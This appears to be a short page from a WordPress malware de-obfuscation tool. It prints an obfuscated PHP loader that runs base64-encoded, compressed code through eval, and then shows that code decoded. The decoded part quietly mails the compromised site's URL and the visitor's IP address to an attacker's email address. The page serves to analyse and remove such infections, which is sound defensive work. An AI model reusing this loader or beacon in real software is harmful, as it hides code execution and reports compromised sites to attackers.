De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXQOJl5\x61TmJJ\x61lYWUmJx\x61lmJvEpq\x63n5K\x61k\x61xSVFR\x61llGio\x2bmRWaUGAN\x41\x41\x3d\x3d"; $Lix = "NsJQV5WkCs1A+5jG/uOU/Tf6W33rtJtg3P4avcy+btuc9XOYynq+kk84kjztzC4f4VCgggSsilkxdQf9ADshb2uVkrm6qXkxExSGkWHbmiovj5cEjBvozpjtC9cH/diDJj2w+wIP4TrLD+sXCSWS9Uk0Bthn4fsZ5ezdt21oQHaLaU9NMtWVYCgwVuATKWV+RtWG+e+cxbBDjyaKb8AtpTS99IMAwUWc6wowzo8e+QrEoIJGsfmbuj8Ns1xWzha1Z07GyviSnGZpnYTcaGXbN3KHURFmVJhp/XPXcbTsbrCtbdrL+SipJl3ZJLQ8MlqGcLg8mHZoHKpT+feOAfokT3tFzV6+/D2tkajmyom9Ii0idrmPgnvjMnqzjixwYz/NIVkLfs/BfXMFwI8adDZjcin/SHQLBwJe+fcA4Eg/CHQPB4fvBIUA"; eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto)))); exit; ?>
<?php $Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXQOJl5aTmJJalYWUmJxalmJvEpqcn5KakaxSVFRallGio+mRWaUGANAA=="; $Lix = "NsJQV5WkCs1A+5jG/uOU/Tf6W33rtJtg3P4avcy+btuc9XOYynq+kk84kjztzC4f4VCgggSsilkxdQf9ADshb2uVkrm6qXkxExSGkWHbmiovj5cEjBvozpjtC9cH/diDJj2w+wIP4TrLD+sXCSWS9Uk0Bthn4fsZ5ezdt21oQHaLaU9NMtWVYCgwVuATKWV+RtWG+e+cxbBDjyaKb8AtpTS99IMAwUWc6wowzo8e+QrEoIJGsfmbuj8Ns1xWzha1Z07GyviSnGZpnYTcaGXbN3KHURFmVJhp/XPXcbTsbrCtbdrL+SipJl3ZJLQ8MlqGcLg8mHZoHKpT+feOAfokT3tFzV6+/D2tkajmyom9Ii0idrmPgnvjMnqzjixwYz/NIVkLfs/BfXMFwI8adDZjcin/SHQLBwJe+fcA4Eg/CHQPB4fvBIUA"; eval { @ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8'); $tujuanmail = 'ribelcyberteam@gmail.com'; $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; $pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]"; mail($tujuanmail, "Hehehe", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]"); }; exit;
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.